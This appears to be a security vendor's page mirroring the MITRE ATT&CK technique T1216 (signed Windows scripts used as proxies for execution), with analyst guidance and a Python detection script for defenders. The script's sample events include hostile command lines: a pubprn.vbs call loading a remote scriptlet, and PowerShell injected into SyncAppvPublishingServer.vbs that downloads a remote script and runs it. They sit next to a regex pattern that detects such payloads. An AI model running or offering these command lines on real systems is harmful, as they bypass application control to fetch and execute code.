MITRE ATT&CK® Technique

T1216: System Script Proxy Execution

Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.[1] This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.[2]

Domain: Enterprise | ID: T1216 | Type: Technique | Object version: 3.0
Glexia's Take

Analyst context for executives and security teams

Analyst confidence High

System Script Proxy Execution matters because trusted, often Microsoft-signed Windows scripts can be used as an execution path for malicious files. For leaders, the business issue is not the script itself; it is whether application control and signature-based trust are being treated as sufficient when trusted scripts may still launch unauthorized activity.

Executive priority

Prioritize this as a Windows execution-control and monitoring validation item. Ask whether application control, script blocking, and SOC telemetry account for signed Microsoft utilities and scripts being used as proxies, not just unsigned or obviously malicious files. This is especially relevant for audit evidence around execution prevention and for incident response decisions where a signed script may otherwise be misclassified as benign.

Technical view

ATT&CK lists this as a Windows technique under the Defense Evasion tactic, with no official detection text on the parent object. Defensive validation should therefore be driven by the related detection strategy DET0466, which focuses on script-based proxy execution via signed Microsoft utilities, and by the two sub-techniques, PubPrn (T1216.001) and SyncAppvPublishingServer (T1216.002). SOC and IR teams should review whether execution chains involving trusted Windows scripts, the script hosts that run them (cscript.exe, wscript.exe), command shell use, PowerShell invocation, and remote or unauthorized file execution are visible and triaged in context rather than trusted solely because a Microsoft signature is present.

Likely telemetry

  • Windows process creation events, including parent-child process relationships for script hosts and command shells
  • Command-line arguments for signed scripts and associated interpreters
  • PowerShell execution telemetry where script proxying invokes PowerShell commands
  • Application control or execution prevention logs such as allow, block, and audit decisions
  • File execution metadata, including signer information and file path context

Detection direction

  • Validate DET0466-style coverage for signed Microsoft utilities and scripts being used to proxy execution, rather than only alerting on unsigned binaries.
  • Tune detections around unusual parent-child relationships, script arguments, and execution of remote or unauthorized files while accounting for legitimate administrative and Windows application virtualization activity.
  • Review the PubPrn and SyncAppvPublishingServer sub-techniques as concrete detection design inputs for Windows environments.
  • Do not rely on certificate signing alone as a benign signal; correlate signer trust with command line, file location, initiating user, and downstream process behavior.
  • Because ATT&CK provides no official detection text for the parent technique, confirm coverage with local telemetry tests and incident review rather than assuming vendor defaults detect it.

Mitigation priorities

  • Implement and maintain execution prevention controls as represented by M1038, including application control and script blocking where appropriate.
  • Use allowlisting policy design that considers trusted scripts capable of launching other files, not only the trust status of the initial script.
  • Run application control in an audit or validation workflow before enforcement where business-critical Windows or App-V related scripts may be present.
  • Document approved administrative use cases for Windows signed scripts so SOC teams can distinguish expected activity from suspicious proxy execution.
  • Feed observed gaps back into endpoint hardening, detection engineering, and compliance evidence for execution control effectiveness.
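
The detection direction above and the mitigation note about documenting approved administrative use both reduce to one question: can the telemetry distinguish a signed script used as intended from the same script used as a proxy? The following is an added example, not Glexia, MITRE or LOLBAS code, written in Python over constructed Sysmon-style process-creation events (host names, users, PIDs and URLs are placeholders). It encodes two rules: an argument rule (a script: moniker passed to pubprn.vbs, PowerShell injected into the SyncAppvPublishingServer.vbs argument) and a parent-child rule (a child process that the script's legitimate use would not spawn). The assumed legitimate argument shapes (pubprn.vbs takes a server and an LDAP path; SyncAppvPublishingServer.vbs takes a server id and switches) and the expected children are assumptions, and the signer field is carried as context rather than used as a benign signal.

```python
"""Hypothetical T1216 detection logic over constructed process-creation events
(Sysmon Event ID 1 field names). Added example; not Glexia, MITRE or LOLBAS code."""
import re

SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}
# Signed proxy scripts -> (sub-technique, children that legitimate use spawns).
# pubprn.vbs loads its target in-process, so legitimate use spawns nothing (assumption).
PROXY_SCRIPTS = {"pubprn.vbs": ("T1216.001", set()),
                 "syncappvpublishingserver.vbs": ("T1216.002", {"powershell.exe"})}
# Injection indicators for SyncAppvPublishingServer.vbs arguments; legitimate
# arguments are assumed to be a numeric server id plus switches such as -Global.
PS_INJECTION = re.compile(r"[;|]|\b(iex|invoke-expression|new-object|downloadstring|"
                          r"downloadfile|frombase64string|start-process)\b", re.I)

def basename(path):
    """Lower-cased last path component, accepting \\ or / separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def split_cmdline(cmdline):
    """Minimal Windows-style tokenizer: whitespace splits, double quotes group."""
    tokens, cur, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    return tokens + ["".join(cur)] if cur else tokens

def proxy_script_invocation(event):
    """(script, sub_technique, args) when a script host runs a known proxy script."""
    if event is None or basename(event["Image"]) not in SCRIPT_HOSTS:
        return None
    tokens = split_cmdline(event["CommandLine"])
    for i, tok in enumerate(tokens):
        if basename(tok) in PROXY_SCRIPTS:
            return basename(tok), PROXY_SCRIPTS[basename(tok)][0], tokens[i + 1:]
    return None

def abusive_arguments(script, args):
    """Reason string when the arguments look like proxy execution, else None."""
    if script == "pubprn.vbs" and any(a.lower().startswith("script:") for a in args):
        return "pubprn.vbs given a script: moniker instead of an LDAP path"
    if script == "syncappvpublishingserver.vbs" and PS_INJECTION.search(" ".join(args)):
        return "PowerShell injected into SyncAppvPublishingServer.vbs arguments"
    return None

def finding(event, technique, reason, parent=None):
    # The signer is carried as context only; it never suppresses a finding.
    return {"technique": technique, "pid": event["ProcessId"], "user": event["User"],
            "signer": event.get("Signature", "unsigned"), "reason": reason,
            "parent_pid": parent["ProcessId"] if parent else None}

def detect(events):
    """Argument rule per event, plus a parent-child rule keyed on ParentProcessId."""
    by_pid = {e["ProcessId"]: e for e in events}
    results = []
    for e in events:
        hit = proxy_script_invocation(e)
        if hit and abusive_arguments(hit[0], hit[2]):
            results.append(finding(e, hit[1], abusive_arguments(hit[0], hit[2])))
        phit = proxy_script_invocation(by_pid.get(e["ParentProcessId"]))
        if phit:
            script, technique, pargs = phit
            child = basename(e["Image"])
            if abusive_arguments(script, pargs) or child not in PROXY_SCRIPTS[script][1]:
                results.append(finding(e, technique, f"{child} spawned by {script}",
                                       by_pid[e["ParentProcessId"]]))
    return results

def ev(pid, ppid, image, cmdline, user):
    return {"ProcessId": pid, "ParentProcessId": ppid, "Image": image,
            "CommandLine": cmdline, "User": user, "Signature": "Microsoft Windows"}

# Constructed telemetry: hosts, users, PIDs and URLs are placeholders.
SYS = r"C:\Windows\System32"
PUBPRN = SYS + r"\Printing_Admin_Scripts\en-US\pubprn.vbs"
SYNC = SYS + r"\SyncAppvPublishingServer.vbs"
PS = SYS + r"\WindowsPowerShell\v1.0\powershell.exe"
CSCRIPT, WSCRIPT, CMD = SYS + r"\cscript.exe", SYS + r"\wscript.exe", SYS + r"\cmd.exe"
LDAP = "LDAP://CN=Printers,DC=corp,DC=example"
PAYLOAD = "(New-Object Net.WebClient).DownloadString('https://files.example.test/s2.ps1') | IEX"
EVENTS = [
    ev(1001, 900, CSCRIPT, f'cscript.exe "{PUBPRN}" printsrv01 "{LDAP}"', r"CORP\printadmin"),
    ev(1002, 950, CSCRIPT, f"cscript.exe {PUBPRN} 127.0.0.1 script:https://files.example.test/p.sct", r"CORP\jdoe"),
    ev(1003, 4, CSCRIPT, f"cscript.exe {SYNC} 1 -Global", r"NT AUTHORITY\SYSTEM"),
    ev(1011, 1003, PS, 'powershell.exe -NoProfile -Command "Sync-AppvPublishingServer 1 -Global"', r"NT AUTHORITY\SYSTEM"),
    ev(1004, 950, WSCRIPT, f'wscript.exe {SYNC} "n;{PAYLOAD}"', r"CORP\jdoe"),
    ev(1010, 1004, PS, f'powershell.exe -NoProfile -Command "Sync-AppvPublishingServer n;{PAYLOAD}"', r"CORP\jdoe"),
    ev(1005, 951, CSCRIPT, f'cscript.exe "{PUBPRN}" printsrv02 "{LDAP}"', r"CORP\jdoe"),
    ev(1021, 1005, CMD, "cmd.exe /c whoami", r"CORP\jdoe"),
]

if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f["technique"], f["pid"], f["user"], f["reason"])
```

Run stand-alone, the sample batch produces four findings: the pubprn.vbs invocation with a script: moniker (PID 1002), the SyncAppvPublishingServer.vbs invocation with injected PowerShell (PID 1004), the powershell.exe child of that injected invocation (PID 1010, correlated through its parent), and a cmd.exe child of an otherwise normal-looking pubprn.vbs run (PID 1021). The two legitimate invocations (PIDs 1001 and 1003) and the powershell.exe that SyncAppvPublishingServer.vbs legitimately spawns (PID 1011) are not flagged, which is the documented-use distinction the mitigation list asks for; every event here carries a Microsoft signer, so the signer field alone would have separated none of them.

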

Analyst notes and limits

The supplied ATT&CK object is a parent technique with two related sub-techniques: PubPrn and SyncAppvPublishingServer. The strongest defensive value is in validating whether Windows execution controls and monitoring can distinguish legitimate signed-script use from signed-script proxy execution. External references are LOLBAS and the Ultimate AppLocker Bypass List, which support the living-off-the-land and application-control-bypass framing.

ATT&CK provides no official detection text for this object, and the supplied relationship context does not include detailed DET0466 analytics. This take does not assert active exploitation, attribution, prevalence, or guaranteed detection. Local Windows configuration, application control policy, script usage, and logging depth are required to determine actual risk and coverage.

Official MITRE ATT&CK definition

System Script Proxy Execution

Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.[1] This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.[2]

The same entry is available on attack.mitre.org (MITRE-hosted reference).

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Related techniques

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

Domain       ID         Name                      Relationship / procedure
Enterprise   T1216.001  PubPrn                    Sub-technique of this object
Enterprise   T1216.002  SyncAppvPublishingServer  Sub-technique of this object
Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release: 19.1
Object version: 3.0
Created:
Modified:
Raw hash: e1aeeb7ad50ed15b...

Imported snapshots across ATT&CK releases (1)

Release  Bundle imported  Object version  Modified  Status          Raw hash
19.1                      3.0                       Current bundle  e1aeeb7ad50e…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  [1] LOLBAS Project. Oddvar Moe et al. (2022, February). Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.
  [2] GitHub Ultimate AppLocker Bypass List. Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved April 10, 2018.
  [3] mitre-attack T1216.

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.